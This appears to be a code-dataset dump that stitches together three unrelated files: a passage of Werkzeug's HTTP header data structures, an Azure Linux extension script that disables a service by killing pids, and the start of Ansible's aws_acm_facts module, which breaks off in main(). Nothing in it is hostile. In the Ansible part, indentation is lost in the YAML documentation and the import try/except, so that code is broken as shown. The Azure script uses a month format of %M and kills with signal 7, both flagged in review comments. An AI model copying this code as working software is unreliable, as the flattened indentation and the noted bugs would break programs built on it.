        if inserted_any and self.on_update is not None:
            self.on_update(self)

    def discard(self, header):
        """Like :meth:`remove` but ignores errors.

        :param header: the header to be discarded.
        """
        try:
            return self.remove(header)
        except KeyError:
            pass

    def find(self, header):
        """Return the index of the header in the set or return -1 if not found.

        :param header: the header to be looked up.
        """
        header = header.lower()
        for idx, item in enumerate(self._headers):
            if item.lower() == header:
                return idx
        return -1

    def index(self, header):
        """Return the index of the header in the set or raise an
        :exc:`IndexError`.

        :param header: the header to be looked up.
        """
        rv = self.find(header)
        if rv < 0:
            raise IndexError(header)
        return rv

    def clear(self):
        """Clear the set."""
        self._set.clear()
        del self._headers[:]
        if self.on_update is not None:
            self.on_update(self)

    def as_set(self, preserve_casing=False):
        """Return the set as real python set type.  When calling this, all
        the items are converted to lowercase and the ordering is lost.

        :param preserve_casing: if set to `True` the items in the set returned
                                will have the original case like in the
                                :class:`HeaderSet`, otherwise they will
                                be lowercase.
        """
        if preserve_casing:
            return set(self._headers)
        return set(self._set)

    def to_header(self):
        """Convert the header set into an HTTP header string."""
        return ', '.join(map(quote_header_value, self._headers))

    def __getitem__(self, idx):
        return self._headers[idx]

    def __delitem__(self, idx):
        rv = self._headers.pop(idx)
        self._set.remove(rv.lower())
        if self.on_update is not None:
            self.on_update(self)

    def __setitem__(self, idx, value):
        old = self._headers[idx]
        self._set.remove(old.lower())
        self._headers[idx] = value
        self._set.add(value.lower())
        if self.on_update is not None:
            self.on_update(self)

    def __contains__(self, header):
        return header.lower() in self._set

    def __len__(self):
        return len(self._set)

    def __iter__(self):
        return iter(self._headers)

    def __nonzero__(self):
        return bool(self._set)

    # Python 3 looks up ``__bool__`` for truth testing; without this alias
    # an empty HeaderSet would be truthy there (consistent with the
    # ``ContentRange`` class which already aliases it).
    __bool__ = __nonzero__

    def __str__(self):
        return self.to_header()

    def __repr__(self):
        return '%s(%r)' % (
            self.__class__.__name__,
            self._headers
        )
class ETags(object):
    """A set that can be used to check if one etag is present in a collection
    of etags.
    """

    def __init__(self, strong_etags=None, weak_etags=None, star_tag=False):
        # A star tag (``*``) matches everything, so the strong set is
        # intentionally dropped in that case.
        self._strong = frozenset(not star_tag and strong_etags or ())
        self._weak = frozenset(weak_etags or ())
        self.star_tag = star_tag

    def as_set(self, include_weak=False):
        """Convert the `ETags` object into a python set.  Per default all the
        weak etags are not part of this set."""
        rv = set(self._strong)
        if include_weak:
            rv.update(self._weak)
        return rv

    def is_weak(self, etag):
        """Check if an etag is weak."""
        return etag in self._weak

    def contains_weak(self, etag):
        """Check if an etag is part of the set including weak and strong tags."""
        return self.is_weak(etag) or self.contains(etag)

    def contains(self, etag):
        """Check if an etag is part of the set ignoring weak tags.
        It is also possible to use the ``in`` operator.
        """
        if self.star_tag:
            return True
        return etag in self._strong

    def contains_raw(self, etag):
        """When passed a quoted tag it will check if this tag is part of the
        set.  If the tag is weak it is checked against weak and strong tags,
        otherwise strong only."""
        etag, weak = unquote_etag(etag)
        if weak:
            return self.contains_weak(etag)
        return self.contains(etag)

    def to_header(self):
        """Convert the etags set into a HTTP header string."""
        # NOTE(review): RFC 7232 spells the weak indicator ``W/`` with an
        # uppercase W; lowercase is kept here to preserve behavior --
        # confirm before changing.
        if self.star_tag:
            return '*'
        return ', '.join(
            ['"%s"' % x for x in self._strong] +
            ['w/"%s"' % x for x in self._weak]
        )

    def __call__(self, etag=None, data=None, include_weak=False):
        # Exactly one of ``etag`` and ``data`` must be given; the etag is
        # generated from the data otherwise.
        if [etag, data].count(None) != 1:
            raise TypeError('either tag or data required, but at least one')
        if etag is None:
            etag = generate_etag(data)
        if include_weak:
            if etag in self._weak:
                return True
        return etag in self._strong

    def __nonzero__(self):
        return bool(self.star_tag or self._strong or self._weak)

    # Python 3 looks up ``__bool__`` for truth testing; without this alias
    # an empty ETags object would be truthy there (consistent with the
    # ``ContentRange`` class which already aliases it).
    __bool__ = __nonzero__

    def __str__(self):
        return self.to_header()

    def __iter__(self):
        return iter(self._strong)

    def __contains__(self, etag):
        return self.contains(etag)

    def __repr__(self):
        return '<%s %r>' % (self.__class__.__name__, str(self))
class IfRange(object):
    """Very simple object that represents the `If-Range` header in parsed
    form.  It will either have neither a etag or date or one of either but
    never both.

    .. versionadded:: 0.7
    """

    def __init__(self, etag=None, date=None):
        #: The etag parsed and unquoted.  Ranges always operate on strong
        #: etags so the weakness information is not necessary.
        self.etag = etag
        #: The date in parsed format or `None`.
        self.date = date

    def to_header(self):
        """Converts the object back into an HTTP header."""
        # A date takes precedence over an etag; an empty object
        # serializes to an empty string.
        if self.date is not None:
            return http_date(self.date)
        elif self.etag is not None:
            return quote_etag(self.etag)
        return ''

    def __str__(self):
        return self.to_header()

    def __repr__(self):
        return '<{0} {1!r}>'.format(type(self).__name__, str(self))
class Range(object):
    """Represents a range header.  All the methods are only supporting bytes
    as unit.  It does store multiple ranges but :meth:`range_for_length` will
    only work if only one range is provided.

    .. versionadded:: 0.7
    """

    def __init__(self, units, ranges):
        #: The units of this range.  Usually "bytes".
        self.units = units
        #: A list of ``(begin, end)`` tuples for the range header provided.
        #: The ranges are non-inclusive.
        self.ranges = ranges

    def range_for_length(self, length):
        """If the range is for bytes, the length is not None and there is
        exactly one range and it is satisfiable it returns a ``(start, stop)``
        tuple, otherwise `None`.
        """
        # Guard clauses: only a single byte range against a known length
        # can be resolved.
        if self.units != 'bytes':
            return None
        if length is None or len(self.ranges) != 1:
            return None
        begin, stop = self.ranges[0]
        if stop is None:
            # Open-ended range ("begin-") runs to the end of the resource.
            stop = length
        if begin < 0:
            # Suffix range ("-n") addresses the last n bytes.
            begin += length
        if not is_byte_range_valid(begin, stop, length):
            return None
        return begin, min(stop, length)

    def make_content_range(self, length):
        """Creates a :class:`~werkzeug.datastructures.ContentRange` object
        from the current range and given content length.
        """
        resolved = self.range_for_length(length)
        if resolved is not None:
            return ContentRange(self.units, resolved[0], resolved[1], length)

    def to_header(self):
        """Converts the object back into an HTTP header."""
        parts = []
        for begin, end in self.ranges:
            if end is None:
                # Suffix ranges are already written as "-n".
                parts.append(str(begin) if begin < 0 else '%s-' % begin)
            else:
                # Stored ranges are non-inclusive; the header is inclusive.
                parts.append('%s-%s' % (begin, end - 1))
        return '%s=%s' % (self.units, ','.join(parts))

    def __str__(self):
        return self.to_header()

    def __repr__(self):
        return '<{0} {1!r}>'.format(type(self).__name__, str(self))
class ContentRange(object):
    """Represents the content range header.

    .. versionadded:: 0.7
    """

    def __init__(self, units, start, stop, length=None, on_update=None):
        assert is_byte_range_valid(start, stop, length), \
            'Bad range provided'
        self.on_update = on_update
        self.set(start, stop, length, units)

    def _callback_property(name):
        # Factory (usable only at class-body level) for properties that
        # notify ``on_update`` whenever one of the range attributes is
        # assigned.  ``name`` is the backing attribute, e.g. ``'_start'``.
        def fget(self):
            return getattr(self, name)

        def fset(self, value):
            setattr(self, name, value)
            if self.on_update is not None:
                self.on_update(self)
        return property(fget, fset)

    #: The units to use, usually "bytes"
    units = _callback_property('_units')
    #: The start point of the range or `None`.
    start = _callback_property('_start')
    #: The stop point of the range (non-inclusive) or `None`.  Can only be
    #: `None` if also start is `None`.
    stop = _callback_property('_stop')
    #: The length of the range or `None`.
    length = _callback_property('_length')

    def set(self, start, stop, length=None, units='bytes'):
        """Simple method to update the ranges."""
        assert is_byte_range_valid(start, stop, length), \
            'Bad range provided'
        # Assign the backing attributes directly so ``on_update`` fires
        # only once for the whole update.
        self._units = units
        self._start = start
        self._stop = stop
        self._length = length
        if self.on_update is not None:
            self.on_update(self)

    def unset(self):
        """Sets the units to `None` which indicates that the header should
        no longer be used.
        """
        self.set(None, None, units=None)

    def to_header(self):
        # An unset range serializes to an empty string; an unknown length
        # is written as ``*`` per the Content-Range grammar.
        if self.units is None:
            return ''
        if self.length is None:
            length = '*'
        else:
            length = self.length
        if self.start is None:
            return '%s */%s' % (self.units, length)
        return '%s %s-%s/%s' % (
            self.units,
            self.start,
            self.stop - 1,
            length
        )

    def __nonzero__(self):
        return self.units is not None

    # Python 3 alias for truth testing.
    __bool__ = __nonzero__

    def __str__(self):
        return self.to_header()

    def __repr__(self):
        return '<%s %r>' % (self.__class__.__name__, str(self))
class Authorization(ImmutableDictMixin, dict):
    """Represents an `Authorization` header sent by the client.  You should
    not create this kind of object yourself but use it when it's returned by
    the `parse_authorization_header` function.

    This object is a dict subclass and can be altered by setting dict items
    but it should be considered immutable as it's returned by the client and
    not meant for modifications.

    .. versionchanged:: 0.5
       This object became immutable.
    """

    def __init__(self, auth_type, data=None):
        dict.__init__(self, data or {})
        # The auth scheme, e.g. ``'basic'`` or ``'digest'``.
        self.type = auth_type

    username = property(lambda x: x.get('username'), doc='''
        The username transmitted. This is set for both basic and digest
        auth all the time.''')
    password = property(lambda x: x.get('password'), doc='''
        When the authentication type is basic this is the password
        transmitted by the client, else `None`.''')
    realm = property(lambda x: x.get('realm'), doc='''
        This is the server realm sent back for HTTP digest auth.''')
    nonce = property(lambda x: x.get('nonce'), doc='''
        The nonce the server sent for digest auth, sent back by the client.
        A nonce should be unique for every 401 response for HTTP digest
        auth.''')
    uri = property(lambda x: x.get('uri'), doc='''
        The URI from Request-URI of the Request-Line; duplicated because
        proxies are allowed to change the Request-Line in transit. HTTP
        digest auth only.''')
    nc = property(lambda x: x.get('nc'), doc='''
        The nonce count value transmitted by clients if a qop-header is
        also transmitted. HTTP digest auth only.''')
    cnonce = property(lambda x: x.get('cnonce'), doc='''
        If the server sent a qop-header in the ``WWW-Authenticate``
        header, the client has to provide this value for HTTP digest auth.
        See the RFC for more details.''')
    response = property(lambda x: x.get('response'), doc='''
        A string of 32 hex digits computed as defined in RFC 2617, which
        proves that the user knows a password. Digest auth only.''')
    opaque = property(lambda x: x.get('opaque'), doc='''
        The opaque header from the server returned unchanged by the client.
        It is recommended that this string be base64 or hexadecimal data.
        Digest auth only.''')

    @property
    def qop(self):
        """Indicates what "quality of protection" the client has applied to
        the message for HTTP digest auth."""
        def on_update(header_set):
            # Keep the underlying dict entry in sync with the mutable
            # header set handed out to the caller.
            if not header_set and 'qop' in self:
                del self['qop']
            elif header_set:
                self['qop'] = header_set.to_header()
        return parse_set_header(self.get('qop'), on_update)
class WWWAuthenticate(UpdateDictMixin, dict):
    """Provides simple access to `WWW-Authenticate` headers."""

    #: list of keys that require quoting in the generated header
    _require_quoting = frozenset(['domain', 'nonce', 'opaque', 'realm'])

    def __init__(self, auth_type=None, values=None, on_update=None):
        dict.__init__(self, values or ())
        if auth_type:
            self['__auth_type__'] = auth_type
        self.on_update = on_update

    def set_basic(self, realm='authentication required'):
        """Clear the auth info and enable basic auth."""
        # Use the plain dict methods so ``on_update`` fires exactly once.
        dict.clear(self)
        dict.update(self, {'__auth_type__': 'basic', 'realm': realm})
        if self.on_update:
            self.on_update(self)

    def set_digest(self, realm, nonce, qop=('auth',), opaque=None,
                   algorithm=None, stale=False):
        """Clear the auth info and enable digest auth."""
        d = {
            '__auth_type__': 'digest',
            'realm': realm,
            'nonce': nonce,
            'qop': dump_header(qop)
        }
        if stale:
            d['stale'] = 'TRUE'
        if opaque is not None:
            d['opaque'] = opaque
        if algorithm is not None:
            d['algorithm'] = algorithm
        # Use the plain dict methods so ``on_update`` fires exactly once.
        dict.clear(self)
        dict.update(self, d)
        if self.on_update:
            self.on_update(self)

    def to_header(self):
        """Convert the stored values into a WWW-Authenticate header."""
        d = dict(self)
        # The auth scheme is stored under a reserved key; default to basic.
        auth_type = d.pop('__auth_type__', None) or 'basic'
        return '%s %s' % (auth_type.title(), ', '.join([
            '%s=%s' % (key, quote_header_value(value,
                                               allow_token=key not in self._require_quoting))
            for key, value in iteritems(d)
        ]))

    def __str__(self):
        return self.to_header()

    def __repr__(self):
        return '<%s %r>' % (
            self.__class__.__name__,
            self.to_header()
        )

    def auth_property(name, doc=None):
        """A static helper function for subclasses to add extra authentication
        system properties onto a class::

            class FooAuthenticate(WWWAuthenticate):
                special_realm = auth_property('special_realm')

        For more information have a look at the sourcecode to see how the
        regular properties (:attr:`realm` etc.) are implemented.
        """
        def _set_value(self, value):
            if value is None:
                self.pop(name, None)
            else:
                self[name] = str(value)
        return property(lambda x: x.get(name), _set_value, doc=doc)

    def _set_property(name, doc=None):
        # Class-body helper for directives whose value is a set (``domain``,
        # ``qop``): returns a property yielding a header set that writes
        # changes back into the underlying dict.
        def fget(self):
            def on_update(header_set):
                if not header_set and name in self:
                    del self[name]
                elif header_set:
                    self[name] = header_set.to_header()
            return parse_set_header(self.get(name), on_update)
        return property(fget, doc=doc)

    type = auth_property('__auth_type__', doc='''
        The type of the auth mechanism. HTTP currently specifies
        `Basic` and `Digest`.''')
    realm = auth_property('realm', doc='''
        A string to be displayed to users so they know which username and
        password to use. This string should contain at least the name of
        the host performing the authentication and might additionally
        indicate the collection of users who might have access.''')
    domain = _set_property('domain', doc='''
        A list of URIs that define the protection space. If a URI is an
        absolute path, it is relative to the canonical root URL of the
        server being accessed.''')
    nonce = auth_property('nonce', doc='''
        A server-specified data string which should be uniquely generated
        each time a 401 response is made. It is recommended that this
        string be base64 or hexadecimal data.''')
    opaque = auth_property('opaque', doc='''
        A string of data, specified by the server, which should be returned
        by the client unchanged in the Authorization header of subsequent
        requests with URIs in the same protection space. It is recommended
        that this string be base64 or hexadecimal data.''')
    algorithm = auth_property('algorithm', doc='''
        A string indicating a pair of algorithms used to produce the digest
        and a checksum. If this is not present it is assumed to be "MD5".
        If the algorithm is not understood, the challenge should be ignored
        (and a different one used, if there is more than one).''')
    qop = _set_property('qop', doc='''
        A set of quality-of-privacy directives such as auth and auth-int.''')

    def _get_stale(self):
        # The header carries 'TRUE'/'FALSE' strings; expose a bool (or
        # None when the directive is absent).
        val = self.get('stale')
        if val is not None:
            return val.lower() == 'true'

    def _set_stale(self, value):
        if value is None:
            self.pop('stale', None)
        else:
            self['stale'] = value and 'TRUE' or 'FALSE'

    stale = property(_get_stale, _set_stale, doc='''
        A flag, indicating that the previous request from the client was
        rejected because the nonce value was stale.''')
    # The accessor functions are only needed to build the property.
    del _get_stale, _set_stale

    # make auth_property a staticmethod so that subclasses of
    # `WWWAuthenticate` can use it for new properties.
    auth_property = staticmethod(auth_property)
    del _set_property
class FileStorage(object):
    """The :class:`FileStorage` class is a thin wrapper over incoming files.
    It is used by the request object to represent uploaded files.  All the
    attributes of the wrapper stream are proxied by the file storage so
    it's possible to do ``storage.read()`` instead of the long form
    ``storage.stream.read()``.
    """

    def __init__(self, stream=None, filename=None, name=None,
                 content_type=None, content_length=None,
                 headers=None):
        #: The name of the form field this file was submitted under.
        self.name = name
        #: The wrapped stream; falls back to an empty stream.
        self.stream = stream or _empty_stream

        # if no filename is provided we can attempt to get the filename
        # from the stream object passed.  There we have to be careful to
        # skip things like <fdopen>, <stderr> etc.  Python marks these
        # special filenames with angular brackets.
        if filename is None:
            filename = getattr(stream, 'name', None)
            s = make_literal_wrapper(filename)
            if filename and filename[0] == s('<') and filename[-1] == s('>'):
                filename = None

            # On Python 3 we want to make sure the filename is always unicode.
            # This might not be if the name attribute is bytes due to the
            # file being opened from the bytes API.
            if not PY2 and isinstance(filename, bytes):
                filename = filename.decode(sys.getfilesystemencoding(),
                                           'replace')

        self.filename = filename
        if headers is None:
            headers = Headers()
        self.headers = headers
        if content_type is not None:
            headers['Content-Type'] = content_type
        if content_length is not None:
            headers['Content-Length'] = str(content_length)

    def _parse_content_type(self):
        # Parse lazily and cache: the content type rarely changes after
        # construction.
        if not hasattr(self, '_parsed_content_type'):
            self._parsed_content_type = \
                parse_options_header(self.content_type)

    @property
    def content_type(self):
        """The content-type sent in the header.  Usually not available"""
        return self.headers.get('content-type')

    @property
    def content_length(self):
        """The content-length sent in the header.  Usually not available"""
        return int(self.headers.get('content-length') or 0)

    @property
    def mimetype(self):
        """Like :attr:`content_type` but without parameters (eg, without
        charset, type etc.).  For example if the content
        type is ``text/html; charset=utf-8`` the mimetype would be
        ``'text/html'``.

        .. versionadded:: 0.7
        """
        self._parse_content_type()
        return self._parsed_content_type[0]

    @property
    def mimetype_params(self):
        """The mimetype parameters as dict.  For example if the content
        type is ``text/html; charset=utf-8`` the params would be
        ``{'charset': 'utf-8'}``.

        .. versionadded:: 0.7
        """
        self._parse_content_type()
        return self._parsed_content_type[1]

    def save(self, dst, buffer_size=16384):
        """Save the file to a destination path or file object.  If the
        destination is a file object you have to close it yourself after the
        call.  The buffer size is the number of bytes held in memory during
        the copy process.  It defaults to 16KB.

        For secure file saving also have a look at :func:`secure_filename`.

        :param dst: a filename or open file object the uploaded file
                    is saved to.
        :param buffer_size: the size of the buffer.  This works the same as
                            the `length` parameter of
                            :func:`shutil.copyfileobj`.
        """
        from shutil import copyfileobj
        close_dst = False
        if isinstance(dst, string_types):
            # A path was given: open it ourselves and remember to close it.
            dst = open(dst, 'wb')
            close_dst = True
        try:
            copyfileobj(self.stream, dst, buffer_size)
        finally:
            if close_dst:
                dst.close()

    def close(self):
        """Close the underlying file if possible."""
        try:
            self.stream.close()
        except Exception:
            pass

    def __nonzero__(self):
        return bool(self.filename)

    # Python 3 looks up ``__bool__`` for truth testing; without this alias
    # a FileStorage without a filename would be truthy there, defeating
    # the documented emptiness check (consistent with ``ContentRange``).
    __bool__ = __nonzero__

    def __getattr__(self, name):
        # Proxy everything else to the wrapped stream (read, seek, ...).
        return getattr(self.stream, name)

    def __iter__(self):
        # NOTE(review): the sentinel ``''`` never matches ``b''`` from a
        # binary stream, so iterating a binary upload would not terminate
        # at EOF -- kept as-is to preserve behavior; confirm callers.
        return iter(self.readline, '')

    def __repr__(self):
        return '<%s: %r (%r)>' % (
            self.__class__.__name__,
            self.filename,
            self.content_type
        )
# circular dependencies
from werkzeug.http import dump_options_header, dump_header, generate_etag, \
quote_header_value, parse_set_header, unquote_etag, quote_etag, \
parse_options_header, http_date, is_byte_range_valid
from werkzeug import exceptions
| gpl-3.0 |
Azure/azure-linux-extensions | TestHandlerLinux/bin/disable.py | 16 | 3241 | #!/usr/bin/env python
"""
Example Azure Handler script for Linux IaaS
Disable example
"""
import os
import imp
import time
import json

# The agent and the handler utilities ship as plain scripts, not installed
# packages, so they are loaded by file path.
waagent=imp.load_source('waagent','/usr/sbin/waagent')
from waagent import LoggerInit
hutil=imp.load_source('HandlerUtil','./resources/HandlerUtil.py')

# Log to the shared agent log first; once the extension name is known the
# logger is re-initialized into an extension-specific file below.
LoggerInit('/var/log/waagent.log','/dev/stdout')
waagent.Log("disable.py starting.")
logfile=waagent.Log

# Parse the handler environment for the 'Disable' operation: extension
# name, sequence number, version and the config/status/heartbeat paths.
name,seqNo,version,config_dir,log_dir,settings_file,status_file,heartbeat_file,config=hutil.doParse(logfile,'Disable')
LoggerInit('/var/log/'+name+'_Disable.log','/dev/stdout')
waagent.Log(name+" - disable.py starting.")
logfile=waagent.Log

# Report "transitioning" while we work.
# NOTE(review): the format '%Y-%M-%dT%H:%M:%SZ' uses %M (minutes) where the
# month (%m) was almost certainly intended -- confirm before relying on
# these timestamps.
hutil.doStatusReport(name,seqNo,version,status_file,time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),
                time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),name,
                'Disable', 'transitioning', '0', 'Disabling', 'Process Config', 'transitioning', '0', 'Parsing ' + settings_file)
hutil.doHealthReport(heartbeat_file,'NotReady','0','Proccessing Settings')
error_string=''
pid=None
pidfile='./service_pid.txt'
if not os.path.isfile(pidfile):
    # No pid file: the service was never started or was already cleaned
    # up.  Report the error but keep going to handle the heartbeat.
    error_string += pidfile +" is missing."
    error_string = "Error: " + error_string
    waagent.Error(error_string)
    hutil.doStatusReport(name,seqNo,version,status_file,time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),
                    time.strftime("%Y-%M-%dT%H:%M:%SZ", time.gmtime()),name,
                    'Disable', 'transitioning', '0', 'Disabling', 'Process Config', 'transitioning', '0', 'Parsing ' + settings_file)
else:
    pid = waagent.GetFileContents(pidfile)
    # Stop service.py.
    # NOTE(review): signal 7 is SIGBUS on Linux; SIGTERM (15) or SIGKILL
    # (9) was probably intended -- confirm.
    try:
        os.kill(int(pid),7)
    except Exception as e:
        # Best effort: the process may already be gone.
        pass
    # Remove the pidfile; also best effort.
    try:
        os.unlink(pidfile)
    except Exception as e:
        pass
# Kill heartbeat.py if required by the handler manifest.
manifest = waagent.GetFileContents('./HandlerManifest.json')
try:
    s=json.loads(manifest)
except:
    # Without a parsable manifest we cannot tell whether a heartbeat
    # process exists; report and exit.
    waagent.Error('Error parsing HandlerManifest.json. Heath report will not be available.')
    hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service.py succeeded.' + str(pid) + ' created.', 'Exit Successfull', 'success', '0', 'Enable Completed.','NotReady','0',name+' enabled.')
if s[0]['handlerManifest']['reportHeartbeat'] != True :
    # No heartbeat process was started for this extension; we are done.
    hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service.py succeeded.' + str(pid) + ' created.', 'Exit Successfull', 'success', '0', 'Enable Completed.','Ready','0',name+' enabled.')
try:
    pid = waagent.GetFileContents('./heartbeat.pid')
except:
    waagent.Error('Error reading ./heartbeat.pid.')
    hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service.py succeeded.' + str(pid) + ' created.', 'Exit Successfull', 'success', '0', 'Enable Completed.','NotReady','0',name+' enabled.')
# Stop the heartbeat process and report the final disabled state.
if waagent.Run('kill '+pid)==0:
    waagent.Log(name+" disabled.")
hutil.doExit(name,seqNo,version,0,status_file,heartbeat_file,'Disable','NotReady','0', 'Disable service Succeed. Health reporting stoppped.', 'Exit Successfull', 'success', '0', 'Disable Completed.','NotReady','0',name+' disabled.')
| apache-2.0 |
jmighion/ansible | lib/ansible/modules/cloud/amazon/aws_acm_facts.py | 14 | 11659 | #!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: aws_acm_facts
short_description: Retrieve certificate facts from AWS Certificate Manager service
description:
- Retrieve facts for ACM certificates
version_added: "2.5"
options:
name:
description:
- The name of an ACM certificate
status:
description:
- Status to filter the certificate results
choices: ['PENDING_VALIDATION', 'ISSUED', 'INACTIVE', 'EXPIRED', 'VALIDATION_TIMED_OUT']
requirements:
- boto3
author:
- Will Thames (@willthames)
extends_documentation_fragment: aws
'''
EXAMPLES = '''
- name: obtain all ACM certificates
aws_acm_facts:
- name: obtain all facts for a single ACM certificate
aws_acm_facts:
name: "*.example_com"
- name: obtain all certificates pending validation
aws_acm_facts:
statuses:
- PENDING_VALIDATION
'''
RETURN = '''
certificates:
description: A list of certificates
returned: always
type: complex
contains:
certificate:
description: The ACM Certificate body
returned: when certificate creation is complete
sample: '-----BEGIN CERTIFICATE-----\\nMII.....-----END CERTIFICATE-----\\n'
type: string
certificate_arn:
description: Certificate ARN
returned: always
sample: arn:aws:acm:ap-southeast-2:123456789012:certificate/abcd1234-abcd-1234-abcd-123456789abc
type: string
certificate_chain:
description: Full certificate chain for the certificate
returned: when certificate creation is complete
sample: '-----BEGIN CERTIFICATE-----\\nMII...\\n-----END CERTIFICATE-----\\n-----BEGIN CERTIFICATE-----\\n...'
type: string
created_at:
description: Date certificate was created
returned: always
sample: '2017-08-15T10:31:19+10:00'
type: string
domain_name:
description: Domain name for the certificate
returned: always
sample: '*.example.com'
type: string
domain_validation_options:
description: Options used by ACM to validate the certificate
returned: when certificate type is AMAZON_ISSUED
type: complex
contains:
domain_name:
description: Fully qualified domain name of the certificate
returned: always
sample: example.com
type: string
validation_domain:
description: The domain name ACM used to send validation emails
returned: always
sample: example.com
type: string
validation_emails:
description: A list of email addresses that ACM used to send domain validation emails
returned: always
sample:
- admin@example.com
- postmaster@example.com
type: list
validation_status:
description: Validation status of the domain
returned: always
sample: SUCCESS
type: string
failure_reason:
description: Reason certificate request failed
returned: only when certificate issuing failed
type: string
sample: NO_AVAILABLE_CONTACTS
in_use_by:
description: A list of ARNs for the AWS resources that are using the certificate.
returned: always
sample: []
type: list
issued_at:
description: Date certificate was issued
returned: always
sample: '2017-01-01T00:00:00+10:00'
type: string
issuer:
description: Issuer of the certificate
returned: always
sample: Amazon
type: string
key_algorithm:
description: Algorithm used to generate the certificate
returned: always
sample: RSA-2048
type: string
not_after:
description: Date after which the certificate is not valid
returned: always
sample: '2019-01-01T00:00:00+10:00'
type: string
not_before:
description: Date before which the certificate is not valid
returned: always
sample: '2017-01-01T00:00:00+10:00'
type: string
renewal_summary:
description: Information about managed renewal process
returned: when certificate is issued by Amazon and a renewal has been started
type: complex
contains:
domain_validation_options:
description: Options used by ACM to validate the certificate
returned: when certificate type is AMAZON_ISSUED
type: complex
contains:
domain_name:
description: Fully qualified domain name of the certificate
returned: always
sample: example.com
type: string
validation_domain:
description: The domain name ACM used to send validation emails
returned: always
sample: example.com
type: string
validation_emails:
description: A list of email addresses that ACM used to send domain validation emails
returned: always
sample:
- admin@example.com
- postmaster@example.com
type: list
validation_status:
description: Validation status of the domain
returned: always
sample: SUCCESS
type: string
renewal_status:
description: Status of the domain renewal
returned: always
sample: PENDING_AUTO_RENEWAL
type: string
revocation_reason:
description: Reason for certificate revocation
returned: when the certificate has been revoked
sample: SUPERCEDED
type: string
revoked_at:
description: Date certificate was revoked
returned: when the certificate has been revoked
sample: '2017-09-01T10:00:00+10:00'
type: string
serial:
description: The serial number of the certificate
returned: always
sample: 00:01:02:03:04:05:06:07:08:09:0a:0b:0c:0d:0e:0f
type: string
signature_algorithm:
description: Algorithm used to sign the certificate
returned: always
sample: SHA256WITHRSA
type: string
status:
description: Status of the certificate in ACM
returned: always
sample: ISSUED
type: string
subject:
description: The name of the entity that is associated with the public key contained in the certificate
returned: always
sample: CN=*.example.com
type: string
subject_alternative_names:
description: Subject Alternative Names for the certificate
returned: always
sample:
- '*.example.com'
type: list
tags:
description: Tags associated with the certificate
returned: always
type: dict
sample:
Application: helloworld
Environment: test
type:
description: The source of the certificate
returned: always
sample: AMAZON_ISSUED
type: string
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, ec2_argument_spec, get_aws_connection_info
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, AWSRetry, HAS_BOTO3, boto3_tag_list_to_ansible_dict
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def list_certificates_with_backoff(client, statuses=None):
    """Return all ACM certificate summaries, optionally filtered by status.

    Paginates through the full result set; retried with exponential
    backoff on transient AWS errors.
    """
    paginator = client.get_paginator('list_certificates')
    kwargs = dict()
    if statuses:
        kwargs['CertificateStatuses'] = statuses
    return paginator.paginate(**kwargs).build_full_result()['CertificateSummaryList']
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def get_certificate_with_backoff(client, certificate_arn):
    """Return the certificate body and chain for *certificate_arn*."""
    response = client.get_certificate(CertificateArn=certificate_arn)
    # strip out response metadata
    return {'Certificate': response['Certificate'],
            'CertificateChain': response['CertificateChain']}
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def describe_certificate_with_backoff(client, certificate_arn):
    """Return the full metadata dict for *certificate_arn* (retried)."""
    return client.describe_certificate(CertificateArn=certificate_arn)['Certificate']
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def list_certificate_tags_with_backoff(client, certificate_arn):
    """Return the AWS tag list for *certificate_arn* (retried)."""
    return client.list_tags_for_certificate(CertificateArn=certificate_arn)['Tags']
def get_certificates(client, module, name=None, statuses=None):
    """Describe every matching ACM certificate.

    Parameters
    ----------
    client : boto3 ACM client
    module : AnsibleModule
        Used only for ``fail_json`` error reporting.
    name : str, optional
        When given, restrict results to this exact domain name.
    statuses : list, optional
        When given, restrict results to these certificate statuses.

    Returns
    -------
    list of dict
        Snake-cased certificate metadata, including body/chain (when
        issued) and a ``tags`` dict.
    """
    try:
        summaries = list_certificates_with_backoff(client, statuses)
    except botocore.exceptions.ClientError as e:
        module.fail_json(msg="Couldn't obtain certificates",
                         exception=traceback.format_exc(),
                         **camel_dict_to_snake_dict(e.response))

    # Optionally narrow the listing down to a single domain name.
    if name:
        summaries = [cert for cert in summaries
                     if cert['DomainName'] == name]

    described = []
    for summary in summaries:
        arn = summary['CertificateArn']
        domain = summary['DomainName']
        try:
            cert_data = describe_certificate_with_backoff(client, arn)
        except botocore.exceptions.ClientError as e:
            module.fail_json(msg="Couldn't obtain certificate metadata for domain %s" % domain,
                             exception=traceback.format_exc(),
                             **camel_dict_to_snake_dict(e.response))
        try:
            cert_data.update(get_certificate_with_backoff(client, arn))
        except botocore.exceptions.ClientError as e:
            # A certificate still being issued has no body/chain yet; that
            # case is expected and silently skipped.
            if e.response['Error']['Code'] != "RequestInProgressException":
                module.fail_json(msg="Couldn't obtain certificate data for domain %s" % domain,
                                 exception=traceback.format_exc(),
                                 **camel_dict_to_snake_dict(e.response))
        cert_data = camel_dict_to_snake_dict(cert_data)
        try:
            tags = list_certificate_tags_with_backoff(client, arn)
        except botocore.exceptions.ClientError as e:
            module.fail_json(msg="Couldn't obtain tags for domain %s" % domain,
                             exception=traceback.format_exc(),
                             **camel_dict_to_snake_dict(e.response))
        cert_data['tags'] = boto3_tag_list_to_ansible_dict(tags)
        described.append(cert_data)
    return described
def main():
    """Ansible entry point: gather ACM certificate facts and exit."""
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        name=dict(),
        statuses=dict(type='list'),
    )
